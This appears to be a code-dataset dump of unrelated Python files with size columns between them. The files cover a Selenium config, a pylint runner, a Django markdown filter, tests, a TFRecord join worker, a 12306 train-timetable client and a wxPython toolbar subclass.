        :param value: Value to be processed
        :type level: :class:`int`
        :param level: Indentation level
        """
        if not value:
            self._print_level('{},', 0)
            return
        self._print_level('{', 0)
        for k in sorted(value.keys()):
            self._print_level("'%s':" % k, level, False)
            self._process_value(value[k], level)
        self._print_level('},', level - self._indent)

    def _pprint_list(self, value, level=0):
        """
        Pretty print a list, one element per line.

        :type value: :class:`list`
        :param value: Value to be processed
        :type level: :class:`int`
        :param level: Indentation level
        """
        if not value:
            self._print_level('[],', 0)
            return
        self._print_level('[', 0)
        for v in value:
            self._print_level('', level, False)
            self._process_value(v, level)
        self._print_level('],', level - self._indent)
| 13,493 | 3,787 |
# Selenium Grid hub endpoint and login credentials for the remote WebDriver.
# NOTE(review): hard-coded IP and credentials checked into source — consider
# loading these from environment variables or a secrets store instead.
hub = 'http://18.216.225.173:4444/wd/hub'
user = 'user'
password = 'password'
| 78 | 44 |
import os
import sys
from shlex import quote

import yaml
from jinja2 import Environment, PackageLoader, Template
# shebangs
#!yaml_jinja
#!yaml_mako
#!mako|yaml
#!jinja|yaml
#!jinja|mako|yaml
#!mako|yaml|stateconf
#!jinja|yaml|stateconf
#!mako|yaml_odict
#!mako|yaml_odict|stateconf
def check(fn):
    """Run pylint (errors only) on *fn* and raise if it reports problems.

    os.system returns the shell exit status shifted left 8 bits; 0 means a
    clean run and 512 (exit code 2) is tolerated per the original author's
    note that it marks an already-known failure. Anything else raises.
    """
    print("Consider {0}".format(fn))
    # BUG FIX: quote the filename so paths containing spaces or shell
    # metacharacters cannot break (or inject into) the shell command. The
    # shell is still used deliberately so '~' expands to the home directory.
    r = os.system("~/.local/bin/pylint -E --rcfile=pylint.rc %s" % quote(fn))
    if r not in (0, 512):  # 512 = check failed
        raise Exception('fail %s' % r)
# Recursively lint every Python file under the current directory.
for root, dirs, files in os.walk("./"):
    for filen in files:
        if filen.endswith(".py"):
            check(root + "/" + filen)
| 1,005 | 395 |
"""Template filter for rendering Markdown to HTML."""
from django import template
from django.utils.safestring import mark_safe
from django.template.defaultfilters import stringfilter
from markdownx.utils import markdownify
register = template.Library()
@register.filter
@stringfilter
def markdown(raw_markdown):
    """Render Markdown as HTML.

    Args:
        raw_markdown (str): Text of raw Markdown.

    Returns:
        HTML string of rendered Markdown marked as safe.
    """
    # mark_safe disables Django's autoescaping for the rendered HTML, so
    # the markdownify configuration is responsible for sanitising any
    # untrusted input.
    return mark_safe(markdownify(raw_markdown))
| 537 | 150 |
#!/usr/bin/env python
""" Testsuite for the user text input
Created 15.12.2021
@author Max Weise
"""
import unittest
from unittest import TestCase
from backup_script.tk_file_extention_dialog import TextInputDialog
class Test_TextInputDialog(TestCase):
    """ Testcase for the custom tkinter text input dialog."""

    __UNDER_TEST: TextInputDialog

    def setUp(self) -> None:
        """ Set up a fresh instance of the text input dialog per test."""
        self.__UNDER_TEST = TextInputDialog(title='Test Instance')

    def test_get_user_input(self) -> None:
        """ Test that the user input is returned as a list of strings."""
        self.__UNDER_TEST.set_contents_input_dialog('Test Submit Button')  # Mock the user input
        expected = ['Test', 'Submit', 'Button']
        self.__UNDER_TEST.run()
        actual = self.__UNDER_TEST.get_user_input()
        self.assertTrue(len(actual) > 0)
        self.assertEqual(len(actual), 3)
        # BUG FIX: the original called assertAlmostEqual(actual.sort(),
        # expected.sort()) — list.sort() returns None, so the assertion
        # compared None with None and could never fail. Compare sorted
        # copies for an order-insensitive equality check instead.
        self.assertEqual(sorted(actual), sorted(expected))
        self.assertEqual(self.__UNDER_TEST.exit_code, 0)

    def test_cancle_button(self) -> None:
        """ Test the behaviour of the cancel button."""
        self.__UNDER_TEST.set_contents_input_dialog('Test Cancle Button')  # Mock the user input
        expected = []
        self.__UNDER_TEST.run()
        actual = self.__UNDER_TEST.get_user_input()
        self.assertEqual(len(actual), 0)
        self.assertEqual(actual, expected)
        self.assertEqual(self.__UNDER_TEST.exit_code, 1)


if __name__ == '__main__':
    unittest.main()
| 1,572 | 492 |
# Generated by Django 3.0.3 on 2020-04-26 14:01
from django.db import migrations, models
class Migration(migrations.Migration):
    """Repoint profile_model image fields at the users_profiles media paths."""

    dependencies = [
        # Must run after the previous auto-generated My_Account migration.
        ('My_Account', '0005_auto_20200426_1643'),
    ]

    operations = [
        migrations.AlterField(
            model_name='profile_model',
            name='Cover_Image',
            # NOTE(review): upload_to here lacks the trailing slash that
            # Profile_Image below has — harmless to Django, but inconsistent.
            field=models.ImageField(default='users_profiles/cover_images/default_cover_image.jpg', upload_to='users_profiles/cover_images'),
        ),
        migrations.AlterField(
            model_name='profile_model',
            name='Profile_Image',
            field=models.ImageField(default='users_profiles/profile_images/default_profile_image.jpg', upload_to='users_profiles/profile_images/'),
        ),
    ]
| 755 | 246 |
# Copyright 2021 Alibaba Group Holding Limited. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import os
from typing import List
import tensorflow_io
import tensorflow as tf
from tensorflow.python.platform import gfile
from xfl.data.local_join.aux_table import AuxTable
from xfl.data.local_join import utils
from xfl.data.local_join.sharding import FileSharding
from xfl.common.logger import log
# Eager mode so LocalJoinWorker.run() can iterate TFRecordDataset directly
# and call .numpy() on each record.
tf.compat.v1.enable_eager_execution()
class LocalJoinWorker(object):
    """Joins one worker's shard of TFRecord input files against auxiliary tables.

    For every input example, each key column in ``left_keys`` is looked up in
    the corresponding entry of ``aux_tables``; any matched right-side example
    is merged into the input example before it is written to the output dir.
    """

    def __init__(self,
                 input_dir: str,
                 output_dir: str,
                 worker_idx: int,
                 worker_num: int,
                 left_keys: list,
                 aux_tables: List[AuxTable],
                 ):
        """Store configuration; validation/IO happens later in open().

        Raises:
            RuntimeError: if ``left_keys`` and ``aux_tables`` differ in length
                (one key column is required per auxiliary table).
        """
        self.input_dir = input_dir
        self.output_dir = output_dir
        self.aux_tables = aux_tables
        self.worker_idx = worker_idx
        self.worker_num = worker_num
        self.left_keys = left_keys
        # Shards assigned to this worker; populated by open().
        self.shard_to_process = []
        if len(left_keys) != len(aux_tables):
            raise RuntimeError('left_keys size must be equal with aux_table size {}, got {}'
                               .format(len(aux_tables), len(left_keys)))

    def open(self):
        """Validate dirs, open every aux table and compute this worker's shards."""
        utils.assert_valid_dir(path=self.input_dir)
        if not gfile.Exists(self.output_dir):
            gfile.MakeDirs(self.output_dir)
        for t in self.aux_tables:
            t.open()
        sharding = FileSharding()
        self.shard_to_process = sharding.shard(worker_idx=self.worker_idx,
                                               worker_num=self.worker_num,
                                               input_path=self.input_dir,
                                               output_path=self.output_dir)
        log.info("worker {} will process {} shards...".format(self.worker_idx, len(self.shard_to_process)))

    def run(self):
        """Process each assigned shard: read, join against aux tables, write.

        Each shard is a (input_path, output_path) pair produced by open().

        Raises:
            RuntimeError: if an input file is missing, a key column is absent,
                is not a bytes_list, or does not hold exactly one value.
        """
        for shard in self.shard_to_process:
            log.info("read file {}, and begin writing to file {}.".format(shard[0], shard[1]))
            if not gfile.Exists(shard[0]):
                raise RuntimeError("file {} does not exist, please check input data.".format(shard[0]))
            if not gfile.Exists(os.path.dirname(shard[1])):
                gfile.MakeDirs(os.path.dirname(shard[1]))
            # Context manager guarantees the writer is flushed and closed even
            # when a malformed record raises below (the original leaked the
            # writer on that path).
            with tf.io.TFRecordWriter(shard[1]) as writer:
                dataset = tf.data.TFRecordDataset(shard[0])
                for raw_record in dataset:
                    example = tf.train.Example()
                    example.ParseFromString(raw_record.numpy())
                    for k, t in zip(self.left_keys, self.aux_tables):
                        if k not in example.features.feature:
                            raise RuntimeError("key col {} is not in input record, please check your data.".format(k))
                        if not example.features.feature[k].WhichOneof('kind') == 'bytes_list':
                            raise RuntimeError("key col {} type must be bytes_list, but got {}".format(k, example.features.feature[k].WhichOneof('kind')))
                        if not len(example.features.feature[k].bytes_list.value) == 1:
                            raise RuntimeError("key col {} length must be 1, but got {}".format(k, len(example.features.feature[k].bytes_list.value)))
                        example_right_str = t.get(example.features.feature[k].bytes_list.value[0])
                        if example_right_str is not None:
                            example_right = tf.train.Example()
                            example_right.ParseFromString(example_right_str)
                            example.MergeFrom(example_right)
                    writer.write(example.SerializeToString())
            log.info("write to file {} end.".format(shard[1]))
| 3,993 | 1,187 |
#!/usr/bin/env python3
from datetime import date
from itertools import chain
from operator import itemgetter
from os.path import commonprefix
from tickets import API
from typing import Any, Iterable, Dict, List, Optional, Tuple
from util import repl, AttrDict
# Maps a coach's single-letter 'commentCode' (see
# Wifi12306.explain_train_compile_list) to its Chinese annotation text.
COMMENT_MAPPING = {
    'A': "",
    'B': "宿",
    'C': "广",
    'D': "办",
    'E': "宿广",
    'F': "",
    'G': "",
    'H': "联运",
    'I': "回转",
    'J': "",
    'K': "广办",
    'L': "欠",
    'M': "",
    'N': "残",
    'O': "残广",
    'P': "残办",
    'Q': "静",
}
class Wifi12306(API):
    'https://wifi.12306.cn/wifiapps/ticket/api/'
    # NOTE(review): the bare string above is the class docstring and appears to
    # double as the service base URL consumed by the tickets.API base class
    # (not visible here) — do not reword it without confirming.

    def __init__(self):
        """Create a session with a mobile WeChat-style User-Agent."""
        super().__init__()
        self.headers.update({
            'User-Agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 15_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/8.0.20(0x18001428) NetType/4G Language/zh_CN',
        })

    def request(self, *args, json=True, **kwargs):
        """Issue a request and unwrap the JSON envelope.

        Raises APIError when the response's 'status' field is truthy or
        missing; otherwise returns the 'data' payload. With json=False the
        raw response is returned untouched.
        """
        resp = super().request(*args, json=json, **kwargs)
        if not json:
            return resp
        if resp.get('status', -1):
            raise APIError(resp.get('error'))
        return resp.get('data')

    @staticmethod
    def yyyymmdd_format(date: date) -> str:
        """Format a date as 'YYYYMMDD' (parameter deliberately shadows the
        imported date class to keep the public keyword name)."""
        return date.isoformat().replace('-', '')

    @staticmethod
    def from_yyyymmdd_format(s: str) -> date:
        """Parse a 'YYYYMMDD' string into a date.

        Bug fix: the original used '{0[:4]}'.format(s); str.format does not
        support slicing — ':4' is treated as a lookup key and raises
        TypeError. Slice the string directly instead.
        """
        return date.fromisoformat(f'{s[:4]}-{s[4:6]}-{s[6:8]}')

    def train_list_by_station_name(
        self,
        from_station_name: str,
        to_station_name: str,
        query_date: Optional[date]=None,
    ) -> List[Dict[str, Any]]:
        """List trains between two stations (by name) on query_date
        (defaults to today)."""
        if not query_date:
            query_date = date.today()
        return self.get(
            'stoptime/queryByStationName',
            params=dict(
                trainDate=query_date.isoformat(),
                fromStationName=from_station_name,
                toStationName=to_station_name))

    def run_rule_by_train_no(
        self,
        train_no: str,
        start_date: Optional[date]=None,
        end_date: Optional[date]=None,
    ) -> Dict[date, bool]:
        """Return {date: runs?} for the train over [start_date, end_date].

        Defaults to today through tomorrow. The API encodes "runs" as '1'.
        """
        if not start_date:
            start_date = date.today()
        if not end_date:
            end_date = date.fromordinal(start_date.toordinal() + 1)
        resp = self.get(
            'trainDetailInfo/queryTrainRunRuleByTrainNoAndDateRange',
            params=dict(
                start=self.yyyymmdd_format(start_date),
                end=self.yyyymmdd_format(end_date),
                trainNo=train_no))
        return {
            self.from_yyyymmdd_format(k): resp[k] == '1'
            for k in sorted(resp)
        }

    def stop_time_by_train_code(
        self,
        train_code: str,
        query_date: Optional[date]=None,
        big_screen: Optional[bool]=False,
    ) -> List[Dict[str, Any]]:
        """Return the stop-time (timetable) records for a train code."""
        if not query_date:
            query_date = date.today()
        return self.get(
            'stoptime/queryByTrainCode',
            params=dict(
                getBigScreen=['NO', 'YES'][big_screen],
                trainDate=self.yyyymmdd_format(query_date),
                trainCode=train_code))

    def pre_seq_train_by_train_code(
        self,
        train_code: str,
        query_date: Optional[date]=None,
    ) -> List[Dict[str, Any]]:
        """Return the preceding-sequence train legs for a train code."""
        if not query_date:
            query_date = date.today()
        return self.get(
            'preSequenceTrain/getPreSequenceTrainInfo',
            params=dict(
                trainDate=self.yyyymmdd_format(query_date),
                trainCode=train_code))

    def train_set_type_by_train_code(self, train_code: str) -> Dict[str, Any]:
        """Return trainset-type info for a train code."""
        return self.get(
            'trainDetailInfo/getTrainsetTypeByTrainCode',
            params=dict(trainCode=train_code))

    def train_compile_list_by_train_no(self, train_no: str) -> List[Dict]:
        """Return the coach-composition records for a train number."""
        return self.get(
            'trainDetailInfo/queryTrainCompileListByTrainNo',
            params=dict(trainNo=train_no))

    def train_equipment_by_train_no(self, train_no: str) -> List[Dict]:
        """Return rolling-stock (equipment) records for a train number."""
        return self.get(
            'trainDetailInfo/queryTrainEquipmentByTrainNo',
            params=dict(trainNo=train_no))

    @staticmethod
    def denormalize_multiple_train_code(train_codes: Iterable[str]) -> str:
        """Collapse codes into 'prefix + suffix/suffix' form.

        E.g. ['Z97', 'Z98'] -> 'Z97/8'. Consecutive duplicates are skipped;
        the common prefix is computed across all distinct codes.
        """
        train_numbers = []
        for i, t in enumerate(train_codes):
            if i == 0:
                prefix = t
                last_train_number = t
                train_numbers.append(t)
            elif t != last_train_number:
                prefix = commonprefix([prefix, t])
                last_train_number = t
                train_numbers.append(t)
        return prefix + '/'.join(t[len(prefix):] for t in train_numbers)

    def info_by_train_code(self, train_code: str) -> Optional[Dict[str, Any]]:
        """Summarize a train: stations, combined code, train_no, distance and
        (hours, minutes) time span. Returns None when no timetable exists.

        AttrDict(locals()) captures every local above, including `stations`.
        """
        stations = self.stop_time_by_train_code(train_code)
        if not stations:
            return
        start_station, *_, end_station = stations
        train_code = self.denormalize_multiple_train_code(
            s['stationTrainCode'] for s in stations)
        train_no = start_station['trainNo']
        distance = end_station['distance']
        time_span = self.explain_time_span(end_station['timeSpan'])
        return AttrDict(locals())

    @staticmethod
    def explain_time_span(milliseconds: int) -> Tuple[int, int]:
        """Convert a millisecond duration into (hours, minutes)."""
        return divmod(milliseconds // 1000 // 60, 60)

    @classmethod
    def explain_stop_time(cls, stations: List[Dict[str, Any]]) -> str:
        """Format timetable rows as a text table.

        Mutates each station dict, adding 'hours'/'minutes' for formatting.
        """
        for s in stations:
            s['hours'], s['minutes'] = cls.explain_time_span(s['timeSpan'])
        return '\n'.join(chain(
            ['\n'],
            ['车次 里程 用时 编号 到站 发车 电报码 站名', '-' * 21],
            (
                '{stationTrainCode:5} {distance:4} {hours:02}:{minutes:02}'
                ' {stationNo} {arriveTime} {startTime} '
                '-{stationTelecode} {stationName}'.format_map(s)
                for s in stations),
            ))

    @staticmethod
    def explain_pre_seq_train(pre_seq_train: List[Dict[str, Any]]) -> str:
        """Format preceding-sequence legs as a text table."""
        return '\n'.join(chain(
            ['\n'],
            ['车次 里程 发时 到时 发站 到站', '-' * 18],
            (
                '{trainCode:5} {distance:>4} '
                '{startTime} {endTime} {startStation} {endStation}'.format_map(s)
                for s in pre_seq_train),
            ))

    @staticmethod
    def explain_train_equipment(train_equipment: List[Dict[str, Any]]) -> str:
        """Format depot and trainset names; '重联' marks a coupled pair."""
        depot = '{bureaName}局({deploydepotName}){depotName} '.format_map(
            train_equipment[0])
        vehicles = ' '.join(e['trainsetName'] for e in train_equipment)
        if len(train_equipment) > 1:
            vehicles += ' 重联'
        return depot + vehicles

    @staticmethod
    def explain_train_compile_list(train_compile_list: List[Dict]) -> str:
        """Format coach composition as a text table, sorted by coach number.

        Mutates each record, adding a human-readable 'comment'.
        NOTE(review): assumes 'commentCode' is present — a missing code would
        make `' ' + comment` raise TypeError; confirm against the API.
        """
        for c in train_compile_list:
            comment = c.get('commentCode')
            c['comment'] = ' ' + comment + ' ' + COMMENT_MAPPING.get(comment, '')
        return '\n'.join(chain(
            ['\n'],
            ['编号 车种 定员 附注', '-' * 10],
            ('{coachNo:4} {coachType:4.4} {limit1:3} {comment}'.
                format_map(c) for c in sorted(
                    train_compile_list, key=itemgetter('coachNo'))),
            ))

    def repl_handler(self, train_code: str) -> str:
        """Look up and print everything known about a train code; returns the
        next REPL prompt."""
        try:
            info = self.info_by_train_code(train_code)
        except APIError as e:
            print(e)
            return '> '
        if info is None:
            # Bug fix: info_by_train_code returns None for an unknown code;
            # the original fell through to format_map(None) and crashed.
            return '> '
        print(
            '{train_code}({start_station[stationName]}-'
            '{end_station[stationName]},{distance} km,'
            '{time_span[0]:02}:{time_span[1]:02})'.format_map(info))
        train_equipment = self.train_equipment_by_train_no(info.train_no)
        if train_equipment:
            print(self.explain_train_equipment(train_equipment))
        else:
            # NOTE(review): passes train_no where the helper's parameter is
            # named train_code — confirm the endpoint accepts a train number.
            train_set_type = self.train_set_type_by_train_code(info.train_no)
            if train_set_type:
                print('{trainsetType}{trainsetTypeName}'.format_map(
                    train_set_type))
        train_compile_list = self.train_compile_list_by_train_no(info.train_no)
        if train_compile_list:
            print(self.explain_train_compile_list(train_compile_list))
        print(self.explain_stop_time(info.stations))
        pre_seq_train = self.pre_seq_train_by_train_code(train_code)
        if pre_seq_train:
            print(self.explain_pre_seq_train(pre_seq_train))
        return '> '
class APIError(ValueError):
    """Raised by Wifi12306.request when the API reports a non-zero status."""
    pass
# Start an interactive prompt that looks up train info by train code.
if __name__ == '__main__':
    repl(Wifi12306().repl_handler)
| 8,528 | 2,886 |
"""Test the Coronavirus config flow."""
from unittest.mock import MagicMock, patch
from aiohttp import ClientError
from homeassistant import config_entries, setup
from homeassistant.components.coronavirus.const import DOMAIN, OPTION_WORLDWIDE
from homeassistant.core import HomeAssistant
async def test_form(hass: HomeAssistant) -> None:
    """Test we get the form."""
    await setup.async_setup_component(hass, "persistent_notification", {})

    # Starting a user flow must present the country selection form.
    form_step = await hass.config_entries.flow.async_init(
        DOMAIN, context={"source": config_entries.SOURCE_USER}
    )
    assert form_step["type"] == "form"
    assert form_step["errors"] == {}

    # Submitting the worldwide option must create the config entry.
    entry_step = await hass.config_entries.flow.async_configure(
        form_step["flow_id"],
        {"country": OPTION_WORLDWIDE},
    )
    assert entry_step["type"] == "create_entry"
    assert entry_step["title"] == "Worldwide"
    assert entry_step["result"].unique_id == OPTION_WORLDWIDE
    assert entry_step["data"] == {"country": OPTION_WORLDWIDE}

    await hass.async_block_till_done()
    assert len(hass.states.async_all()) == 4
@patch(
    "coronavirus.get_cases",
    side_effect=ClientError,
)
async def test_abort_on_connection_error(
    mock_get_cases: MagicMock, hass: HomeAssistant
) -> None:
    """Test we abort on connection error."""
    await setup.async_setup_component(hass, "persistent_notification", {})

    # With get_cases failing, the flow must abort instead of showing a form.
    aborted = await hass.config_entries.flow.async_init(
        DOMAIN, context={"source": config_entries.SOURCE_USER}
    )
    assert "type" in aborted
    assert aborted["type"] == "abort"
    assert "reason" in aborted
    assert aborted["reason"] == "cannot_connect"
| 1,648 | 525 |
import logging.config
import wx
from src.sqlite_executer.ConnectExecuteSqlite import SQLExecuter
from src.view.AutoCompleteTextCtrl import TextCtrlAutoComplete
# from src.view.TreePanel import CreatingTreePanel
from src.view.constants import *
from wx.lib.agw.aui.aui_constants import actionDragFloatingPane, AUI_DOCK_NONE, \
ITEM_NORMAL, ITEM_CHECK, ITEM_RADIO, ID_RESTORE_FRAME, \
AUI_BUTTON_STATE_NORMAL, AUI_BUTTON_STATE_PRESSED
from src.view.views.file.explorer.FileBrowserPanel import FileBrowser
from src.view.views.console.SqlOutputPanel import SqlConsoleOutputPanel
from src.view.views.console.worksheet.WorksheetPanel import CreateWorksheetTabPanel, \
CreatingWorksheetWithToolbarPanel
from src.view.views.sql.history.HistoryListPanel import HistoryGrid
from src.view.views.console.worksheet.WelcomePage import WelcomePanel
from wx.lib.agw.aui.framemanager import NonePaneInfo, wxEVT_AUI_PANE_MIN_RESTORE, \
AuiManagerEvent
from src.view.util.FileOperationsUtil import FileOperations
from wx.lib.platebtn import PlateButton, PB_STYLE_DEFAULT, PB_STYLE_DROPARROW
# from wx.lib.pubsub import setupkwargs
# regular pubsub import
from pubsub import pub
from wx.lib.agw.aui.auibar import AuiToolBarEvent, \
wxEVT_COMMAND_AUITOOLBAR_BEGIN_DRAG, wxEVT_COMMAND_AUITOOLBAR_MIDDLE_CLICK, \
wxEVT_COMMAND_AUITOOLBAR_RIGHT_CLICK
from src.view.views.python.explorer.PythonExplorer import PythonExplorerPanel
from wx import py
from src.view.views.java.explorer.JavaExplorer import CreatingJavaExplorerPanel
from src.view.views.project.explorer.ProjectExplorer import CreatingProjectExplorerPanel
from src.view.views.database.explorer.DataSourceExplorer import DataSourcePanel
from wx.lib.agw.aui import auibook
from src.view.other.new.NewFlow import NewFlowFrame
logging.config.dictConfig(LOG_SETTINGS)
logger = logging.getLogger('extensive')
try:
from agw import aui
from agw.aui import aui_switcherdialog as ASD
except ImportError: # if it's not there locally, try the wxPython lib.
import wx.lib.agw.aui as aui
from wx.lib.agw.aui import aui_switcherdialog as ASD
############################################################
class EclipseAuiToolbar(aui.AuiToolBar):
    """Toolbar for the main frame.

    Several mouse handlers below are customised copies of the
    wx.lib.agw.aui.AuiToolBar defaults; the notable deviations are marked
    with NOTE(review) comments.
    """

    def __init__(self, parent):
        super().__init__(parent, -1, agwStyle=aui.AUI_TB_DEFAULT_STYLE | wx.NO_BORDER)
        # React to pubsub notifications published by other views.
        pub.subscribe(self.__onObjectAdded, 'perspectiveClicked')
        pub.subscribe(self.__onUpdatePageText, 'onUpdatePageText')

    def __onObjectAdded(self, data, extra1, extra2=None):
        # no longer need to access data through message.data.
        # Debug trace of the 'perspectiveClicked' notification payload.
        print('Object', repr(data), 'is added')
        print(extra1)
        if extra2:
            print(extra2)

    def __onUpdatePageText(self, filePath, extra1, extra2=None):
        # no longer need to access data through message.data.
        logger.info(f'EclipseAuiToolbar.onUpdatePageText {filePath}')
        print(extra1)
        if extra2:
            print(extra2)

    def getToolBarItemById(self, id=None):
        # Linear search over the toolbar's items; returns the matching
        # AuiToolBarItem or None if no item carries the given id.
        item = None
        for _item in self._items:
            if _item.id == id:
                item = _item
                break
        return item

    def OnLeaveWindow(self, event):
        """
        Handles the ``wx.EVT_LEAVE_WINDOW`` event for :class:`AuiToolBar`.

        :param `event`: a :class:`MouseEvent` event to be processed.
        """
        self.RefreshOverflowState()
        # NOTE(review): the stock handler also clears the hover/pressed items
        # and the tooltip item here; those resets are commented out below,
        # presumably so a selected button keeps its pressed look — confirm.
        # self.SetHoverItem(None)
        # self.SetPressedItem(None)
        #
        # self._tip_item = None
        self.StopPreviewTimer()

    def SetPressedItem(self, pitem):
        """
        Sets a toolbar item to be currently in a "pressed" state.

        :param `pitem`: an instance of :class:`AuiToolBarItem`.
        """
        # Skips the 'Open Perspective' dropdown; for any other item, clears
        # the pressed flag on every item and presses this one (radio-style).
        if pitem and pitem.label != 'Open Perspective':
            former_item = None
            for item in self._items:
                if item.state & aui.AUI_BUTTON_STATE_PRESSED:
                    former_item = item
                item.state &= ~aui.AUI_BUTTON_STATE_PRESSED
            pitem.state &= ~aui.AUI_BUTTON_STATE_HOVER
            pitem.state |= aui.AUI_BUTTON_STATE_PRESSED
            # Repaint only when the pressed item actually changed.
            if former_item != pitem:
                self.Refresh(False)
                self.Update()

    def OnLeftUp(self, event):
        """
        Handles the ``wx.EVT_LEFT_UP`` event for :class:`AuiToolBar`.

        :param `event`: a :class:`MouseEvent` event to be processed.
        """
        self.SetPressedItem(None)
        hit_item = self.FindToolForPosition(*event.GetPosition())
        if hit_item and not hit_item.state & aui.AUI_BUTTON_STATE_DISABLED:
            self.SetHoverItem(hit_item)
        if self._dragging:
            # reset drag and drop member variables
            self._dragging = False
            self._action_pos = wx.Point(-1, -1)
            self._action_item = None
        else:
            # Only fire a click when the button is released over the same
            # item the press started on.
            if self._action_item and hit_item == self._action_item:
                self.SetToolTip("")
                if hit_item.kind in [ITEM_CHECK, ITEM_RADIO]:
                    # Toggle the check/radio state and emit a menu event.
                    toggle = not (self._action_item.state & aui.AUI_BUTTON_STATE_CHECKED)
                    self.ToggleTool(self._action_item.id, toggle)
                    # repaint immediately
                    self.Refresh(False)
                    self.Update()
                    e = wx.CommandEvent(wx.wxEVT_COMMAND_MENU_SELECTED, self._action_item.id)
                    e.SetEventObject(self)
                    e.SetInt(toggle)
                    self._action_pos = wx.Point(-1, -1)
                    self._action_item = None
                    self.ProcessEvent(e)
                    self.DoIdleUpdate()
                else:
                    if self._action_item.id == ID_RESTORE_FRAME:
                        # Restore a minimized pane via the owning AuiManager.
                        # find aui manager
                        manager = self.GetAuiManager()
                        if not manager:
                            return
                        if self._action_item.target:
                            pane = manager.GetPane(self._action_item.target)
                        else:
                            pane = manager.GetPane(self)
                        # from . import framemanager
                        e = AuiManagerEvent(wxEVT_AUI_PANE_MIN_RESTORE)
                        e.SetManager(manager)
                        e.SetPane(pane)
                        manager.ProcessEvent(e)
                        self.DoIdleUpdate()
                    else:
                        e = wx.CommandEvent(wx.wxEVT_COMMAND_MENU_SELECTED, self._action_item.id)
                        e.SetEventObject(self)
                        self.ProcessEvent(e)
                        self.DoIdleUpdate()
        # reset drag and drop member variables
        self._dragging = False
        self._action_pos = wx.Point(-1, -1)
        self._action_item = None

    def OnRightDown(self, event):
        """
        Handles the ``wx.EVT_RIGHT_DOWN`` event for :class:`AuiToolBar`.

        :param `event`: a :class:`MouseEvent` event to be processed.
        """
        cli_rect = wx.Rect(wx.Point(0, 0), self.GetClientSize())
        # Ignore clicks on the gripper area.
        if self._gripper_sizer_item:
            gripper_rect = self._gripper_sizer_item.GetRect()
            if gripper_rect.Contains(event.GetPosition()):
                return
        # Ignore clicks on the overflow dropdown area.
        if self.GetOverflowVisible():
            dropdown_size = self._art.GetElementSize(aui.AUI_TBART_OVERFLOW_SIZE)
            if dropdown_size > 0 and event.GetX() > cli_rect.width - dropdown_size and \
               event.GetY() >= 0 and event.GetY() < cli_rect.height and self._art:
                return
        # Remember the hit item unless it is disabled.
        self._action_pos = wx.Point(*event.GetPosition())
        self._action_item = self.FindToolForPosition(*event.GetPosition())
        if self._action_item:
            if self._action_item.state & aui.AUI_BUTTON_STATE_DISABLED:
                self._action_pos = wx.Point(-1, -1)
                self._action_item = None
                return

    def OnRightUp(self, event):
        """
        Handles the ``wx.EVT_RIGHT_UP`` event for :class:`AuiToolBar`.

        :param `event`: a :class:`MouseEvent` event to be processed.
        """
        hit_item = self.FindToolForPosition(*event.GetPosition())
        if self._action_item and hit_item == self._action_item:
            e = AuiToolBarEvent(wxEVT_COMMAND_AUITOOLBAR_RIGHT_CLICK, self._action_item.id)
            e.SetEventObject(self)
            e.SetToolId(self._action_item.id)
            e.SetClickPoint(self._action_pos)
            self.ProcessEvent(e)
            self.DoIdleUpdate()
        else:
            # right-clicked on the invalid area of the toolbar
            e = AuiToolBarEvent(wxEVT_COMMAND_AUITOOLBAR_RIGHT_CLICK, -1)
            e.SetEventObject(self)
            e.SetToolId(-1)
            e.SetClickPoint(self._action_pos)
            self.ProcessEvent(e)
            self.DoIdleUpdate()
        # reset member variables
        self._action_pos = wx.Point(-1, -1)
        self._action_item = None

    def OnMiddleDown(self, event):
        """
        Handles the ``wx.EVT_MIDDLE_DOWN`` event for :class:`AuiToolBar`.

        :param `event`: a :class:`MouseEvent` event to be processed.
        """
        cli_rect = wx.Rect(wx.Point(0, 0), self.GetClientSize())
        # Ignore clicks on the gripper area.
        if self._gripper_sizer_item:
            gripper_rect = self._gripper_sizer_item.GetRect()
            if gripper_rect.Contains(event.GetPosition()):
                return
        # Ignore clicks on the overflow dropdown area.
        if self.GetOverflowVisible():
            dropdown_size = self._art.GetElementSize(aui.AUI_TBART_OVERFLOW_SIZE)
            if dropdown_size > 0 and event.GetX() > cli_rect.width - dropdown_size and \
               event.GetY() >= 0 and event.GetY() < cli_rect.height and self._art:
                return
        # Remember the hit item unless it is disabled.
        self._action_pos = wx.Point(*event.GetPosition())
        self._action_item = self.FindToolForPosition(*event.GetPosition())
        if self._action_item:
            if self._action_item.state & aui.AUI_BUTTON_STATE_DISABLED:
                self._action_pos = wx.Point(-1, -1)
                self._action_item = None
                return

    def OnMiddleUp(self, event):
        """
        Handles the ``wx.EVT_MIDDLE_UP`` event for :class:`AuiToolBar`.

        :param `event`: a :class:`MouseEvent` event to be processed.
        """
        hit_item = self.FindToolForPosition(*event.GetPosition())
        if self._action_item and hit_item == self._action_item:
            if hit_item.kind == ITEM_NORMAL:
                e = AuiToolBarEvent(wxEVT_COMMAND_AUITOOLBAR_MIDDLE_CLICK, self._action_item.id)
                e.SetEventObject(self)
                e.SetToolId(self._action_item.id)
                e.SetClickPoint(self._action_pos)
                self.ProcessEvent(e)
                self.DoIdleUpdate()
        # reset member variables
        self._action_pos = wx.Point(-1, -1)
        self._action_item = None

    def OnMotion(self, event):
        """
        Handles the ``wx.EVT_MOTION`` event for :class:`AuiToolBar`.

        :param `event`: a :class:`MouseEvent` event to be processed.
        """
        # start a drag event
        if not self._dragging and self._action_item != None and self._action_pos != wx.Point(-1, -1) and \
           abs(event.GetX() - self._action_pos.x) + abs(event.GetY() - self._action_pos.y) > 5:
            self.SetToolTip("")
            self._dragging = True
            e = AuiToolBarEvent(wxEVT_COMMAND_AUITOOLBAR_BEGIN_DRAG, self.GetId())
            e.SetEventObject(self)
            e.SetToolId(self._action_item.id)
            self.ProcessEvent(e)
            self.DoIdleUpdate()
            return
        hit_item = self.FindToolForPosition(*event.GetPosition())
        if hit_item:
            if not hit_item.state & aui.AUI_BUTTON_STATE_DISABLED:
                self.SetHoverItem(hit_item)
            else:
                self.SetHoverItem(None)
        else:
            # no hit item, remove any hit item
